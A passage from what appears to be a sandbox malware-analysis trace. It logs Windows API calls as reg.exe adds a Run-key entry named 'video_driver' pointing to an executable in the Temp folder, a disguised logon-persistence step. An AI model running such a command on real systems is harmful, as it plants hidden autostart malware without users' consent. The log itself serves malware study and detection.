hHeap=0x530000, dwFlags=0x0, lpMem=0x540088 | out: hHeap=0x530000) returned 1 [0039.497] DeleteProcThreadAttributeList (in: lpAttributeList=0x24ef2c | out: lpAttributeList=0x24ef2c) [0039.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0039.497] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0039.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0039.497] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8b41ac | out: lpMode=0x4a8b41ac) returned 1 [0039.498] _get_osfhandle (_FileHandle=0) returned 0x3 [0039.498] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8b41b0 | out: lpMode=0x4a8b41b0) returned 1 [0039.498] SetConsoleInputExeNameW () returned 0x1 [0039.498] GetConsoleOutputCP () returned 0x1b5 [0039.498] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a8b4260 | out: lpCPInfo=0x4a8b4260) returned 1 [0039.498] SetThreadUILanguage (LangId=0x0) returned 0x409 [0039.498] exit (_Code=0) Process: id = "6" image_name = "reg.exe" filename = "c:\\windows\\syswow64\\reg.exe" page_root = "0x49e9f000" os_pid = "0x7b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x568" cmd_line = "REG ADD \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"video_driver\" /t REG_SZ /d \"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe\" /f" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 6 os_tid = 0x90 [0039.464] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x21f7bc | out: lpSystemTimeAsFileTime=0x21f7bc*(dwLowDateTime=0xfe2fb3a0, dwHighDateTime=0x1d623ff)) [0039.464] GetCurrentProcessId () returned 0x7b4 [0039.464] GetCurrentThreadId () returned 0x90 [0039.464] GetTickCount () returned 0x114514c [0039.464] QueryPerformanceCounter (in: lpPerformanceCount=0x21f7b4 | out: lpPerformanceCount=0x21f7b4*=15959727104) returned 1 [0039.465] GetModuleHandleA (lpModuleName=0x0) returned 0x790000 [0039.465] __set_app_type (_Type=0x1) [0039.465] __p__fmode () returned 0x770331f4 [0039.465] __p__commode () returned 0x770331fc [0039.466] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x79d4f9) returned 0x0 [0039.466] __wgetmainargs (in: _Argc=0x79f030, _Argv=0x79f038, _Env=0x79f034, _DoWildCard=0, _StartInfo=0x79f010 | out: _Argc=0x79f030, _Argv=0x79f038, _Env=0x79f034) returned 0 [0039.466] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0039.468] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0039.468] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x21f73c | out: phkResult=0x21f73c*=0x0) returned 0x2 [0039.468] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0039.468] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0039.469] GetProcessHeap () returned 0x560000 [0039.469] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x10) returned 0x56f188 [0039.469] lstrlenW (lpString="") returned 0 [0039.469] GetProcessHeap () returned 0x560000 [0039.469] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x2) returned 0x574d90 [0039.469] GetProcessHeap () returned 0x560000 [0039.469] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x14) returned 0x574da0 [0039.469] GetProcessHeap () returned 0x560000 [0039.469] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x10) returned 0x56f1a0 [0039.469] GetProcessHeap () returned 0x560000 [0039.469] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x14) returned 0x574dc0 [0039.469] GetProcessHeap () returned 0x560000 [0039.469] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x14) returned 0x574de0 [0039.469] GetProcessHeap () returned 0x560000 [0039.469] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x14) returned 0x574e00 [0039.469] GetProcessHeap () returned 0x560000 [0039.469] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x14) returned 0x574e20 [0039.469] GetProcessHeap () returned 0x560000 [0039.469] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x10) returned 0x56f1b8 [0039.469] GetProcessHeap () returned 0x560000 [0039.469] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x14) returned 0x574e40 [0039.469] GetProcessHeap () returned 0x560000 [0039.469] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x14) returned 0x574e60 [0039.469] GetProcessHeap () returned 0x560000 [0039.469] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x14) returned 0x574e80 [0039.469] GetProcessHeap () returned 0x560000 [0039.469] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x14) returned 0x574ea0 [0039.469] GetProcessHeap () returned 0x560000 [0039.469] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x10) returned 0x56f1d0 [0039.470] GetProcessHeap () returned 0x560000 [0039.470] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x14) returned 0x574ec0 [0039.470] GetProcessHeap () returned 0x560000 [0039.470] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x14) returned 0x574ee0 [0039.470] GetProcessHeap () returned 0x560000 [0039.470] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x14) returned 0x574f00 [0039.470] GetProcessHeap () returned 0x560000 [0039.470] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x14) returned 0x574f38 [0039.470] SetThreadUILanguage (LangId=0x0) returned 0x409 [0039.470] GetProcessHeap () returned 0x560000 [0039.470] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x10) returned 0x56f1e8 [0039.470] _memicmp (_Buf1=0x56f1e8, _Buf2=0x791318, _Size=0x7) returned 0 [0039.471] GetProcessHeap () returned 0x560000 [0039.471] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x1e) returned 0x573f20 [0039.471] lstrlenW (lpString="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 63 [0039.471] GetProcessHeap () returned 0x560000 [0039.471] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x10) returned 0x56f200 [0039.471] _memicmp (_Buf1=0x56f200, _Buf2=0x791318, _Size=0x7) returned 0 [0039.471] GetProcessHeap () returned 0x560000 [0039.471] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x86) returned 0x5758a0 [0039.471] _vsnwprintf (in: _Buffer=0x573f20, _BufferCount=0xe, _Format="|%s|", _ArgList=0x21f658 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0039.471] _vsnwprintf (in: _Buffer=0x5758a0, _BufferCount=0x42, _Format="|%s|", _ArgList=0x21f658 | out: _Buffer="|HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run|") returned 65 [0039.471] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0039.471] lstrlenW (lpString="|HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run|") returned 65 [0039.471] SetLastError (dwErrCode=0x490) [0039.471] lstrlenW (lpString="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 63 [0039.471] GetProcessHeap () returned 0x560000 [0039.471] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x80) returned 0x575930 [0039.471] lstrlenW (lpString="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 63 [0039.471] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0039.471] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0039.471] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0039.471] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0039.471] StrChrW (lpStart=" \x09", wMatch=0x59) returned 0x0 [0039.471] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0039.471] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0039.472] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x56) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0039.473] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0039.474] lstrlenW (lpString="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 63 [0039.474] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0039.474] lstrlenW (lpString="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 63 [0039.474] lstrlenW (lpString="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 63 [0039.474] StrChrIW (lpStart="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" [0039.474] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0039.474] GetProcessHeap () returned 0x560000 [0039.474] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x28) returned 0x575ae0 [0039.475] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_CURRENT_USER", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 3 [0039.475] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKEY_CURRENT_USER", cchCount1=-1, lpString2="HKEY_CURRENT_USER", cchCount2=-1) returned 2 [0039.475] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0039.475] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0039.475] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0039.475] StrChrIW (lpStart="Software\\Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\Microsoft\\Windows\\CurrentVersion\\Run" [0039.475] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0039.475] StrChrIW (lpStart="Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\Windows\\CurrentVersion\\Run" [0039.475] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0039.475] StrChrIW (lpStart="Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\CurrentVersion\\Run" [0039.475] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0039.475] StrChrIW (lpStart="CurrentVersion\\Run", wMatch=0x5c) returned="\\Run" [0039.475] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0039.475] StrChrIW (lpStart="Run", wMatch=0x5c) returned 0x0 [0039.475] SetLastError (dwErrCode=0x490) [0039.475] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0039.475] SetLastError (dwErrCode=0x0) [0039.475] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0039.475] GetProcessHeap () returned 0x560000 [0039.475] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x5c) returned 0x575b10 [0039.475] GetProcessHeap () returned 0x560000 [0039.475] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x88) returned 0x575b78 [0039.475] GetProcessHeap () returned 0x560000 [0039.475] GetProcessHeap () returned 0x560000 [0039.475] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x575ae0) returned 1 [0039.476] GetProcessHeap () returned 0x560000 [0039.476] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x575ae0) returned 0x28 [0039.476] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x575ae0 | out: hHeap=0x560000) returned 1 [0039.476] GetProcessHeap () returned 0x560000 [0039.476] GetProcessHeap () returned 0x560000 [0039.476] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x575930) returned 1 [0039.476] GetProcessHeap () returned 0x560000 [0039.476] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x575930) returned 0x80 [0039.476] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x575930 | out: hHeap=0x560000) returned 1 [0039.476] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0039.476] lstrlenW (lpString="video_driver") returned 12 [0039.476] GetProcessHeap () returned 0x560000 [0039.476] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x1a) returned 0x573f48 [0039.476] lstrlenW (lpString="video_driver") returned 12 [0039.476] StrChrW (lpStart=" \x09", wMatch=0x76) returned 0x0 [0039.476] StrChrW (lpStart=" \x09", wMatch=0x76) returned 0x0 [0039.476] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0039.476] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0039.476] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0039.476] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0039.476] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0039.476] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0039.476] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0039.476] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0039.476] StrChrW (lpStart=" \x09", wMatch=0x76) returned 0x0 [0039.476] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0039.476] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0039.477] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0039.477] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0039.477] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0039.477] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0039.477] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 2 [0039.477] StrDupW (lpSrch="REG_SZ") returned="REG_SZ" [0039.477] lstrlenW (lpString="REG_SZ") returned 6 [0039.477] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0039.477] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0039.477] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0039.477] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0039.477] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0039.477] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0039.477] StrChrW (lpStart=" \x09", wMatch=0x5a) returned 0x0 [0039.477] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_SZ", cchCount1=-1, lpString2="REG_SZ", cchCount2=-1) returned 2 [0039.477] LocalFree (hMem=0x56f218) returned 0x0 [0039.477] SetLastError (dwErrCode=0x0) [0039.477] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0039.477] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0039.477] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0039.478] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0039.478] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0039.478] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0039.478] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0039.478] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0039.478] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 2 [0039.478] lstrlenW (lpString="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe") returned 53 [0039.478] GetProcessHeap () returned 0x560000 [0039.478] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x6c) returned 0x575930 [0039.478] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0039.478] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0039.478] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0039.478] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0039.478] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0039.478] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0039.478] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0039.478] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0039.478] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 3 [0039.478] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-d", cchCount2=-1) returned 1 [0039.479] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0039.479] SetLastError (dwErrCode=0x0) [0039.479] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x21f6ec, lpdwDisposition=0x21f6c4 | out: phkResult=0x21f6ec*=0x70, lpdwDisposition=0x21f6c4*=0x2) returned 0x0 [0039.479] RegQueryValueExW (in: hKey=0x70, lpValueName="video_driver", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x2 [0039.479] lstrlenW (lpString="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe") returned 53 [0039.479] RegSetValueExW (in: hKey=0x70, lpValueName="video_driver", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe", cbData=0x6c | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe") returned 0x0 [0039.479] RegCloseKey (hKey=0x70) returned 0x0 [0039.479] GetProcessHeap () returned 0x560000 [0039.479] GetProcessHeap () returned 0x560000 [0039.479] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x575b10) returned 1 [0039.479] GetProcessHeap () returned 0x560000 [0039.479] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x575b10) returned 0x5c [0039.479] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x575b10 | out: hHeap=0x560000) returned 1 [0039.479] GetProcessHeap () returned 0x560000 [0039.479] GetProcessHeap () returned 0x560000 [0039.480] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x575b78) returned 1 [0039.480] GetProcessHeap () returned 0x560000 [0039.480] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x575b78) returned 0x88 [0039.480] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x575b78 | out: hHeap=0x560000) returned 1 [0039.480] GetProcessHeap () returned 0x560000 [0039.480] GetProcessHeap () returned 0x560000 [0039.480] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x573f48) returned 1 [0039.480] GetProcessHeap () returned 0x560000 [0039.480] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x573f48) returned 0x1a [0039.480] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x573f48 | out: hHeap=0x560000) returned 1 [0039.480] GetProcessHeap () returned 0x560000 [0039.480] GetProcessHeap () returned 0x560000 [0039.480] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x575930) returned 1 [0039.480] GetProcessHeap () returned 0x560000 [0039.480] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x575930) returned 0x6c [0039.480] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x575930 | out: hHeap=0x560000) returned 1 [0039.480] SetLastError (dwErrCode=0x0) [0039.480] GetLastError () returned 0x0 [0039.480] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x21f698, nSize=0x0, Arguments=0x0 | out: lpBuffer="夰W!ㅶy!㝓y") returned 0x27 [0039.481] GetLastError () returned 0x0 [0039.481] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0039.481] GetProcessHeap () returned 0x560000 [0039.481] GetProcessHeap () returned 0x560000 [0039.481] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x574d90) returned 1 [0039.481] GetProcessHeap () returned 0x560000 [0039.481] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x574d90) returned 0x2 [0039.481] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x574d90 | out: hHeap=0x560000) returned 1 [0039.481] GetProcessHeap () returned 0x560000 [0039.481] RtlAllocateHeap (HeapHandle=0x560000, Flags=0xc, Size=0x50) returned 0x575ae0 [0039.481] SetLastError (dwErrCode=0x0) [0039.481] LocalFree (hMem=0x575930) returned 0x0 [0039.481] __iob_func () returned 0x77032900 [0039.481] _fileno (_File=0x77032920) returned 1 [0039.481] _errno () returned 0x3107d8 [0039.481] _get_osfhandle (_FileHandle=1) returned 0x7 [0039.481] _errno () returned 0x3107d8 [0039.481] GetFileType (hFile=0x7) returned 0x2 [0039.482] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0039.482] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x21f658 | out: lpMode=0x21f658) returned 1 [0039.482] __iob_func () returned 0x77032900 [0039.482] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0039.482] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0039.482] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x575ae0*, nNumberOfCharsToWrite=0x27, lpNumberOfCharsWritten=0x21f680, lpReserved=0x0 | out: lpBuffer=0x575ae0*, lpNumberOfCharsWritten=0x21f680*=0x27) returned 1 [0039.483] GetProcessHeap () returned 0x560000 [0039.483] GetProcessHeap () returned 0x560000 [0039.483] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x5758a0) returned 1 [0039.483] GetProcessHeap () returned 0x560000 [0039.483] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x5758a0) returned 0x86 [0039.483] HeapFree (in: 